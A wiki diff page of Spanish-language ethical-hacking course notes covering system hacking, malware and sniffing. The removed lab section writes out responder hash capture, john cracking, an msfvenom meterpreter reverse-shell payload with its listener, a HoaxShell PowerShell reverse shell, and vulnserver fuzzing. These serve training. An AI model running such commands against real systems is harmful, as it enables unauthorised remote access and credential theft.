Diferències

Ací es mostren les diferències entre la revisió seleccionada i la versió actual de la pàgina.

Enllaç a la visualització de la comparació

Ambdós costats versió prèvia Revisió prèvia
Següent revisió
Revisió prèvia
info:cursos:pue:ethical-hacker:sesion2 [18/02/2025 04:13] – [Lab 1] mateinfo:cursos:pue:ethical-hacker:sesion2 [20/02/2025 23:51] (actual) mate
Línia 3: Línia 3:
  
 == clase == clase
-  * Modulo 06+  * ASPEN 
 +    * Modulo 06 - System Hacking 
 +    * Modulo 07 - Malware 
 +    * Modulo 08 - Sniffing
  
 === Modulo 06, apuntes === Modulo 06, apuntes
  
  
-=== Modulo 06+=== Modulo 06 - System Hacking
 ==== sección 1 ==== sección 1
   * hash   * hash
Línia 149: Línia 152:
   * ''history''   * ''history''
  
-=== Lab 1: Sytem hacking 
-==== task 1: Gain Access to the System 
-  - ''sudo responder -I eth0'' -> capturar hash máquina W11 en txt -> hash.txt 
-  - ''john hash.txt'' -> desencripta la contraseña del hash 
  
-==== task 2Gain Access to a Remote System using Reverse Shell Generator +=== Modulo 7malware 
-===== cmd +==== sección 1 
-  * ''docker run --p 80:80 reverse_shell_generator'' +  * troyanos 
-  * ''http://localhost'' +  * virus 
-    * IPPort, MSFVenom -> genera instrucción''msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.1.13 LPORT=4444 -f exe -o reverse.exe'' +  * ransomware 
-    * se genera un EXE - payload (que hemos de conseguir que ejecute la víctima+  * gusanos 
-    * generamos la instrucción para escuchar el payload, en la sección LISTENER, modo **msfconsole** + 
-      * ''msfconsole -q -x "use multi/handler; set payload windows/x64/meterpreter/reverse_tcp; set lhost 10.10.1.13; set lport 4444; exploit"'' +==== sección 2: fileless malware 
-    ejecutamos el listenerejecutamos el payload +  * vivir de lo que ha encontrado en la máquina víctima (LOL Living-off-the-hand) 
-      ''getuid''+  * persistencia
 +  * taxonomia: 
 +    * hardware - sin actividad a nivel de fichero 
 +    * ejecución inyección - usa ficheros  
 +    * exploit 
 +  * APUNTES FERNANDOsección FILELESS 
 + 
 +==== sección 3: AI-based malware 
 +  * FakeGPT 
 +  * WormGPT 
 +  * FraudGPT 
 + 
 +==== sección 4Analisis malware 
 +  * estático: analizar código 
 +  * dinámico: en máquina virtual (sandbox) 
 +  * testbed (9 pasos) 
 +    * https://www.hackplayers.com/2020/04/listado-de-sandboxes-de-analisis-de-malware.html - Listado de sandboxes de análisis de malware gratuitos y online 
 +    * https://github.com/kevoreilly/CAPEv2 - CAPEv2, es un derivado de Cuckoo Sandbox (actualmente abandonado)Es un script que se instala en una MV Ubuntu 20.04 LTS.
 +    * https://github.com/mandiant/flare-vm Flare-VM, parecido a lo anterior, pero en Windows 
 +  * ''string <file>'' 
 +  * ofuscación 
 +    * **PEid**: indica de que tipo es (windows
 +    * **file** para Linux 
 +  Portable Executables 
 +    compendio de todos los ficheros necesarios para ejecutar en cualquier máquina sin instalar 
 +  Dependencias 
 +  desensamblar 
 +  * ejecutables ELF 
 +    * ''readelf'' 
 +  * ejecutables Match-0 (mac) 
 +  * Analizar MS Office (como contenedor de otros archivos) 
 +  * PDF 
 +    * incrustar distro Linux 
 +    * Doom (javascript) 
 +  * Dangerzone 
 +    * https://dangerzone.rocks/ 
 +    * 2 contenedores, uno ejecuta, el otro lee por OCR 
 + 
 +==== sección 05: contramedidas 
 +  * https://www.elespanol.com/omicrono/software/20170101/ejecutar-programas-viejos-windows/182732154_0.html - Ejecutar un programa en Windows con una versión anterior del mismo 
 +  https://www.adslzone.net/esenciales/windows-10/ejecutar-programas-antiguos/ - ejecutar programas antiguos 
 +  * https://www.hackplayers.com/2024/08/windows-downdate-downgrade.html - Windows Downdate: desactualiza tu Windowsy reporta que está actualizado. 
 +  https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/microsoft-defender-atp-linux - Microsoft Defender ATP for Linux
  
-===== powershell 
-  * ''http://localhost'' 
-    * HoaxShell -> PowerShell IEX -> cambiar puerto en el script generado por 444 
-    * copiar y guardar en shell.ps1 
-    * ir a la sección **listener** y generar para HoaxShell (puerto 444) 
-    * ejecutar instrucción generada con sudo: ''sudo python...'' 
-    * ejecutamos en un powershell subido a Administrador el script .ps1 
  
-==== Task 3: Perform Buffer Overflow Attack to Gain Access to a Remote System 
-  * ejecutar como administrador ''vulnserver'' (buffer overflow tools) 
-  * instalar **ImmunityDebugger_1_85_setup.exe** (y Python 2.7) 
-  * ejecutar como administrador 
-    * File -> Attach -> vulnserver <- pausado 
-    * Icono PLAY 
-  * en Linux, ejecutamos ''nc -nv 10.10.1.11 9999'' 
-    * HELP nos lista los comandos disponibles 
-    * QUIT para salir 
-    * creamos un "spike template" -> ''pluma stats.spk'':<code>s_readline(); 
  
-s_string(“STATS ”);+=== Modulo 8: sniffing 
 +  * hub reparte entre todos los puertos, los switch no <- problema para el modo promíscuo 
 +  * switch SPAN Port (modo promíscuo)
  
-s_string_variable(“0”);</code> +==== sección 2 
-    * ''generic_send_tcp 10.10.1.11 9999 stats.spk 0 0'' +  * MAC: 3 primeros fabricante, 3 siguientes  
-      los dos últimos ceros son SKIPVAR y SKIPSTR +  * http://standards-oui.ieee.org/oui/oui.txt - Listado de fabricantes y sus MACs asociadas 
-    * ejecuta y podemos ver en ImmunityDebugger que la opción STAT no es vulnerable +  * ARP: 
-    * Se hace lo mismo cambiando **STAT** por **TRUN** +    * broadcast, no sale a internet, solo LAN, solo IPv4 
-    * PENDIENTE+      * en IPv6 es ND, integrado en ICMP -> https://es.wikipedia.org/wiki/Neighbor_Discovery - Neighbor Discovery (ND) protocolo de IPv6, equivalente al protocolo Address Resolution Protocol (ARP) en IPv4Está integrado en ICMPv6. 
 +  * tabla CAM 
 +    * si se llena la tabla, no se reparte tráfico 
 +    * saturar para cambiar a modo HUB -> ''macof'' 
 +  Switch Port Stealing 
 +    * hacer creer que la máquina ha cambiado de puerto, recibir el tráfico y redirigir a la original 
 +  * DHCP Starvation Attack 
 +    * hambruna 
 +    DoS 
 +  Rogue DHCP Server Attack 
 +  ARP Spoofing attack 
 +  Capsa Portable Network Analyzer 
 +  IRDP Spoofing 
 +  VLAN Hopping 
 +    ver todas las VLAN 
 +  STP Attack 
 +  * DNS Poisoning 
 +    * punto débil de internet 
 +    * https://blog.cloudflare.com/es-es/oblivious-dns/ 
 +  * Detección 
 +    * modo promíscuo 
 +    * nmap detecta (script)
  
-=== lab 2: Perform Privilege Escalation to Gain Higher Privileges 
-==== Task 1: Escalate Privileges by Bypassing UAC and Exploiting Sticky Keys 
  
 +== Examen
 +  * udemy test
 +  * examtopics (pago)
 +  * ProxMox
  • info/cursos/pue/ethical-hacker/sesion2.1739880823.txt.gz
  • Darrera modificació: 18/02/2025 04:13
  • per mate